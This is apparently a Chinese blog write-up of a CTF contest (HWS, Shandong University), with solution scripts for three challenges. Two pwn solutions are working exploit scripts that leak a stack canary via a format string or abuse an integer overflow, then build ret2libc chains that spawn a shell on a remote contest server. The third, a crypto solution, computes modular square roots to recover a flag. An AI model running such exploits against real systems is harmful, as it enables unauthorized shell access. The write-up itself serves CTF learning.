2023.11.18

两天半的比赛,就打了半天(因为要赶去打香山杯决赛了),不过结果还算好,人生第一次拿了两个一血hhh。写wp的时候人在中大南校北门的酒店里:)

controller

格式化字符串泄露canary之后打ret2libc即可。

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('./libc-2.27.so')

evgdb()

rsetup('124.71.135.126',30024)

rdi = 0x0000000000402533 # pop rdi ; ret

putsg = gotadd('puts')

puts = pltadd('puts')

sl(b'6')

sl(b'2')

sl(b'2')

sla('fo',b'%13$p')

sl(b'')

sl(b'1')

sl(b'')

ru(b'No.2')

addx = getx(-13,-1)

base = addx - 0x21c87

dpx('libcbase',base)

sl(b'6')

sl(b'2')

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

can = getx(-19,-1)

dpx('can',can)

#需要泄露canary

sl(b'0')

sl(b'0')

sl(b'')

sl(b'9')

sla('ame:',b's'*1)

sh = base+0x00000000001b3d88

sys = pltadd('system')

ret = 0x0000000000400b3e

#sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+p64(0x400d20))

sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+b'aaaaaaaa'+p64(rdi)+p64(sh)+p64(ret)*3+p64(sys))

ia()

inverse

ret2libc和整数溢出

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('./libc-2.27.so')

evgdb()

rsetup('124.71.135.126',30007)

tag = 0x804C030

puts = pltadd('puts')

putsg = gotadd('puts')

sa(':',b'/bin/sh')

sl(b'-1')

sla(':',b'a'*(0x3c+4)+p32(puts)+p32(0x80493d5)+p32(putsg))

add = getx64(0,-17)

base = getbase(add,'puts')

pause()

sl(b'-1')

sys = symoff('system',base)

sh = base + 0x0017b9db

sl(b'a'*(0x3c+4)+p32(sys)+p32(0xdeadbeef)+p32(sh)+p32(0xdeadbeaf))

ia()

ezrsa

求模平方根即可。

n = 4124820799737107236308837008524397355107786950414769996181324333556950154206980059406402767327725312238673053581148641438494212320157665395208337575556385

m = 13107939563507459774616204141253747489232063336204173944123263284507604328885680072478669016969428366667381358004059204207134817952620014738665450753147857

def legendre_symbol(a, p):

    # 计算雅可比符号 (a/p)

    if a % p == 0:

        return 0

    elif pow(a, (p - 1) // 2, p) == 1:

        return 1

    else:

        return -1

def mod_sqrt(n, p):

    # Tonelli-Shanks 算法求模平方根

    if legendre_symbol(n, p) != 1:

        raise Exception('No modular square root exists')

    q = p - 1

    s = 0

    while q % 2 == 0:

        q //= 2

        s += 1

    if s == 1:

        return pow(n, (p + 1) // 4, p)

    z = 2

    while legendre_symbol(z, p) != -1:

        z += 1

    c = pow(z, q, p)

    r = pow(n, (q + 1) // 2, p)

    t = pow(n, q, p)

    m = s

    while t != 1:

        i = 1

        while pow(t, 2**i, p) != 1:

            i += 1

        b = pow(c, 2**(m - i - 1), p)

        r = (r * b) % p

        t = (t * b * b) % p

        c = (b * b) % p

        m = i

    return r

def solve_quadratic_congruence(n, m):

    # 解二次同余方程 x^2 ≡ n (mod m)

    if m == 2:

        return [n % 2, (n % 2) ^ 1]  # 对于模2,只有0和1两个解

    solutions = []

    # 判断模平方根是否存在

    if pow(n, (m - 1) // 2, m) != 1:

        raise Exception('No solution exists')

    # 计算模平方根

    sqrt_n = mod_sqrt(n, m)

    # 解方程

    x1 = sqrt_n

    x2 = m - sqrt_n

    solutions.append(x1)

    solutions.append(x2)

    return solutions

# 示例用法

result = solve_quadratic_congruence(n, m)

print(f"Solutions for x^2 ≡ {n} (mod {m}): {result}")

'''

>>> from Crypto.Util.number import *

>>> long_to_bytes(13107939563507459774616204141253747489232063336204173944123263271467599846065153978657975398261302535968199127597145828004727119047657179535038810099310932)

b'\xfaFF"\x0bxn\x93\xd1\xfd8\x91\x8d;g\x8c\xf7Wj\xcf\x8c\xde\x94\x14\xea\xd9\xfdB\xd5\x16\xe4>\xe5\xdf%(\xb29^\x87v\x04\x9eOV\xc9\xd18\xc6o\x08\xb8vL\x16N\xb6\xede\xf9\x13\x90aT'

>>> long_to_bytes(13040004482820526093820693618708125830699182230406913376202407698904962835203626640653836925)

b'flag{9971e255f0c020e8e57fbae75f43d7fb}'

'''

HWS山大专区PWN双一血 & CRYPTO-WP的更多相关文章

  1. [复现]2021 DASCTF X BUUOJ 五月大联动-PWN

    [复现]2021 DASCTF X BUUOJ 五月大联动 由于我没ubuntu16就不复现第一个题了,直接第二个 正常的off by one from pwn import * context.os ...

  2. 腾讯云开放云压测“黑科技“,产品上线从此不再“压力山大"

    商业转载请联系腾讯WeTest获得授权,非商业转载请注明出处. 能否解决"高并发"问题一直是检验一个产品后台是否稳定,架构是否合理,性能是否强大的核心标准.对于产品而言,多高的并发 ...

  3. bugku crypto wp上半部分汇总

    1.滴答~滴 摩斯码,在线解开. 2. 栅栏密码,在线解就出flag了. 3. Ook解密,由.?!Ook组成密文,在线网站解密 4.这不是摩斯密码 有点像jsfuck,发现又不是,因为不会出现大于号 ...

  4. 双11遇上ZBrushCore,如此优惠还等什么!

    对不起!让大家久等了,ZBrush简体中文版ZBrushCore这次是真的来了,恰逢双11,老板说了,钱不是问题,你们开心就好,特别是热爱3D的单身狗们!你们那么热爱这个行业,1099元/套终身授权使 ...

  5. 微信事业群WXG成立 致力于打造微信大平台

    今天,微信之父张小龙带领微信团队成立微信事业群(WeiXin Group,简称WXG),致力于打造微信大平台,由他们负责微信基础平台.微信开放平台.微信支付拓展.O2O等微信延伸业务的发展,并包括邮箱 ...

  6. "浪潮杯"第六届ACM山东省省赛山科场总结

    从空间拷过来的.尽管已经过去一个月了.记忆犹新 也算是又一次拾起这个blog Just begin 看着一群群大牛还有队友男神的省赛总结都出了 我最终也耐不住寂寞 来做个流水账抒抒情好了 第一次省赛 ...

  7. 分布式系统中我们会对一些数据量大的业务进行分拆,分布式系统中唯一主键ID的生成问题

    分布式全局唯一ID生成策略​ https://www.cnblogs.com/vandusty/p/11462585.html 一.背景 分布式系统中我们会对一些数据量大的业务进行分拆,如:用户表,订 ...

  8. 2021羊城杯比赛复现(Crypto)

    bigrsa 题目: from Crypto.Util.number import * from flag import * n1 = 10383529640908175186077053551474 ...

  9. 5G为何采纳华为力挺的Polar码?一个通信工程师的大实话

    Polar码被采纳为5G eMBB场景的控制信道编码,这两天连续被这条消息刷屏,连吃瓜群众都直呼好爽. 然而,随着媒体报道的持续发酵,真相在口口相传中变了形,不乏夸大不实之嫌,小编终于坐不住了,也想吐 ...

  10. [转][业界动态] 5G为何采纳华为力挺的Polar码?一个通信工程师的大实话

    本文转自:http://xinsheng.huawei.com/cn/index.php?app=forum&mod=Detail&act=index&id=3264791 P ...

随机推荐

  1. @EnableFeignClients注解源码解析

    转载请注明出处: @EnableFeignClients 注解定义的源码 @Retention(RetentionPolicy.RUNTIME) @Target({ElementType.TYPE}) ...

  2. Java项目配置Maven依赖时不知需要的最低jdk版本?(报错java: 错误: 无效的目标发行版:17)

    1.问题 在配置SpringBoot项目依赖时,使用了最新的spring-boot-starter-parent 3.1.5,但是出现了java: 错误: 无效的目标发行版:17的报错 2.解决 经过 ...

  3. [转帖]直接内存监控不准确,netty玩了什么花?

    https://segmentfault.com/a/1190000044509636     是挺久没有"宠爱"我们netty小婊贝了,最近又开始搞事了. 于是,趁机探究了下MX ...

  4. [转帖]Prometheus 监控之 Blackbox_exporter黑盒监测 [icmp、tcp、http(get\post)、dns、ssl证书过期时间]

    Blackbox_exporter 主动监测主机与服务状态 Prometheus 官方提供的 exporter 之一,可以提供 http.dns.tcp.icmp 的监控数据采集 官方github: ...

  5. [转帖]KVM调整磁盘大小

    https://www.jianshu.com/p/5ca598424eb9 一台win10的虚拟机磁盘空间不足了,需要调整磁盘的大小.上网搜索KVM调整磁盘大小,结果得出的博客都说只有raw格式的能 ...

  6. 【转帖】FIO磁盘性能测试工具

    https://www.jianshu.com/p/70b8c7d5d217 FIO工具介绍 FIO 工具是一款用于测试硬件存储性能的辅助工具,兼具灵活性.可靠性从而从众多性能测试工具中脱颖而出.磁盘 ...

  7. [转帖]总结:Springboot监控Actuator相关

    一.介绍 由于项目中使用的仍然是比较老旧的1.5.6版本,所以本文是基于此版本进行描述. 二.Actuator使用 ActuatorActuator是Spring Boot提供的对应用系统的监控和管理 ...

  8. 公司内部自建DNS的办法 使用私有域名的方法

    最近总是有一个需求,需要自己弄一些服务器域名之类的. 修改hosts总是比较麻烦,所以想了一个简单办法, 自己搭建一个dns服务器, 本来想用最简单的 dnsmasq 但是发现总是不成功, 然后找了另 ...

  9. Redis labs 的安装

    Install and setup This guide shows how to install Redis Enterprise Software, which includes several ...

  10. IPMI的简单使用

    背景 公司一台十一年前的服务器砸到我手中,要重装CentOS7的操作系统. 本着不想进机房, 不想格式化U盘的想法, 想用BMC进行安装系统. 遇到的第一个问题是不知道密码. 询问之前的机器持有人,也 ...